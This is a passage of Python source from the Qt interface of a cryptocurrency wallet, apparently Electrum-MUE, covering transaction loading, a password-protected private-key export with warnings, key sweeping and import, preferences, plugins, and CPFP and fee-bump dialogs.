except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum-MUE was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum_mue import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + str(e))
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-mue-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
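        # The keys are derived on a worker thread; progress and completion are
        # reported back to the GUI via computing_privkeys_signal and
        # show_privkeys_signal so the dialog stays responsive.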
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
            s = '\n'.join(addr + '\t' + privkey for addr, privkey in private_keys.items())
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum-MUE was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
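        # The Sweep button is only enabled once the destination address parses
        # and the pasted text yields at least one valid private key (see
        # on_edit below).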
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {str(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
try:
coins, keypairs = sweep_preparations(get_pk(), self.network)
except Exception as e: # FIXME too broad...
self.show_message(str(e))
return
self.do_clear()
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(addr)
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum_mue.i18n import languages
lang_combo.addItems(list(languages.values()))
lang_keys = list(languages.keys())
lang_cur_setting = self.config.get("language", '')
try:
index = lang_keys.index(lang_cur_setting)
except ValueError: # not in list
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
        msg = '\n'.join([
            _('Time based: fee rate is based on average confirmation time estimates'),
            _('Mempool based: fee rate is targeting a depth in the memory pool'),
        ])
fee_type_label = HelpLabel(_('Fee estimation') + ':', msg)
fee_type_combo = QComboBox()
fee_type_combo.addItems([_('Static')])
fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0)
def on_fee_type(x):
self.config.set_key('mempool_fees', x==2)
self.config.set_key('dynamic_fees', x>0)
self.fee_slider.update()
fee_type_combo.currentIndexChanged.connect(on_fee_type)
fee_widgets.append((fee_type_label, fee_type_combo))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
use_rbf = self.config.get('use_rbf', True)
use_rbf_cb = QCheckBox(_('Use Replace-By-Fee'))
use_rbf_cb.setChecked(use_rbf)
use_rbf_cb.setToolTip(
_('If you check this box, your transactions will be marked as non-final,') + '\n' + \
_('and you will have the possibility, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \
_('Note that some merchants do not accept non-final transactions until they are confirmed.'))
def on_use_rbf(x):
self.config.set_key('use_rbf', bool(x))
batch_rbf_cb.setEnabled(bool(x))
use_rbf_cb.stateChanged.connect(on_use_rbf)
fee_widgets.append((use_rbf_cb, None))
batch_rbf_cb = QCheckBox(_('Batch RBF transactions'))
batch_rbf_cb.setChecked(self.config.get('batch_rbf', False))
batch_rbf_cb.setEnabled(use_rbf)
batch_rbf_cb.setToolTip(
_('If you check this box, your unconfirmed transactions will be consolidated into a single transaction.') + '\n' + \
_('This will save fees.'))
def on_batch_rbf(x):
self.config.set_key('batch_rbf', bool(x))
batch_rbf_cb.stateChanged.connect(on_batch_rbf)
fee_widgets.append((batch_rbf_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see https://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
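        # Colour the alias field according to the last lookup: green when the
        # alias record validated (DNSSEC), red when it did not or the lookup
        # failed; cleared while no alias is configured.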
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = base_units_list
msg = (_('Base unit of your wallet.')
+ '\n1 MUE = 1000 mMUE. 1 mMUE = 1000 uMUE. 1 uMUE = 100 sat.\n'
+ _('This setting affects the Send tab, and all balance related fields.'))
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
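        # Changing the base unit only changes how amounts are displayed: the
        # current field contents are captured in satoshis, the decimal point is
        # updated, and the same amounts are written back in the new unit.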
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
self.decimal_point = base_unit_name_to_decimal_point(unit_result)
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum_mue import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
colortheme_combo = QComboBox()
colortheme_combo.addItem(_('Light'), 'default')
colortheme_combo.addItem(_('Dark'), 'dark')
index = colortheme_combo.findData(self.config.get('qt_gui_color_theme', 'default'))
colortheme_combo.setCurrentIndex(index)
colortheme_label = QLabel(_('Color theme') + ':')
def on_colortheme(x):
self.config.set_key('qt_gui_color_theme', colortheme_combo.itemData(x), True)
self.need_restart = True
colortheme_combo.currentIndexChanged.connect(on_colortheme)
gui_widgets.append((colortheme_label, colortheme_combo))
updatecheck_cb = QCheckBox(_("Automatically check for software updates"))
updatecheck_cb.setChecked(self.config.get('check_updates', False))
def on_set_updatecheck(v):
self.config.set_key('check_updates', v == Qt.Checked, save=True)
updatecheck_cb.stateChanged.connect(on_set_updatecheck)
gui_widgets.append((updatecheck_cb, None))
filelogging_cb = QCheckBox(_("Write logs to file"))
filelogging_cb.setChecked(bool(self.config.get('log_to_file', False)))
def on_set_filelogging(v):
self.config.set_key('log_to_file', v == Qt.Checked, save=True)
filelogging_cb.stateChanged.connect(on_set_filelogging)
filelogging_cb.setToolTip(_('Debug logs can be persisted to disk. These are useful for troubleshooting.'))
gui_widgets.append((filelogging_cb, None))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
            _('This may result in higher transaction fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
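        # Help text for the coin-selection combo below is assembled from each registered chooser's docstring.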
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
def on_outrounding(x):
self.config.set_key('coin_chooser_output_rounding', bool(x))
enable_outrounding = self.config.get('coin_chooser_output_rounding', False)
outrounding_cb = QCheckBox(_('Enable output value rounding'))
outrounding_cb.setToolTip(
_('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' +
_('This might improve your privacy somewhat.') + '\n' +
_('If enabled, at most 100 satoshis might be lost due to this, per transaction.'))
outrounding_cb.setChecked(enable_outrounding)
outrounding_cb.stateChanged.connect(on_outrounding)
tx_widgets.append((outrounding_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
hist_capgains_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
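        # The helper closures below keep the fiat widgets in sync with the exchange-rate (fx)
        # backend; each one bails out early if no fx backend is available.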
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_history_capgains_cb():
if not self.fx: return
hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config())
hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.blockSignals(True)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
ex_combo.blockSignals(False)
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_model.refresh('on_history')
if self.fx.is_enabled() and checked:
self.fx.trigger_update()
update_history_capgains_cb()
def on_history_capgains(checked):
if not self.fx: return
self.fx.set_history_capital_gains_config(checked)
self.history_model.refresh('on_history_capgains')
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_history_capgains_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
hist_capgains_checkbox.stateChanged.connect(on_history_capgains)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('General')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.trigger_update()
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.network.unregister_callback(self.on_quotes)
self.network.unregister_callback(self.on_history)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
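        # A plugin's settings widget is created on demand (only for loaded plugins that provide
        # one) and is enabled only while the plugin itself is enabled.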
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_fee = self.wallet.get_tx_fee(parent_tx)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
out_amt = max_fee - fee_e.get_amount()
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_e.get_amount()
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
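        # The child's fee is chosen so that (parent fee + child fee) over the combined size matches
        # the requested feerate, clamped to at most the spent output's value and at least roughly
        # 1 sat/byte of the combined size.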
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
fee = self.wallet.get_tx_fee(tx)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(tx.txid())
tx_size = tx.estimated_size()
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
vbox.addWidget(QLabel(_('Current fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
        vbox.addWidget(QLabel(_('New fee') + ':'))
fee_e = BTCAmountEdit(self.get_decimal_point)
fee_e.setAmount(fee * 1.5)
vbox.addWidget(fee_e)
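        # Moving the slider converts the selected feerate into an absolute fee for this transaction's size.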
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * tx_size / 1000
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
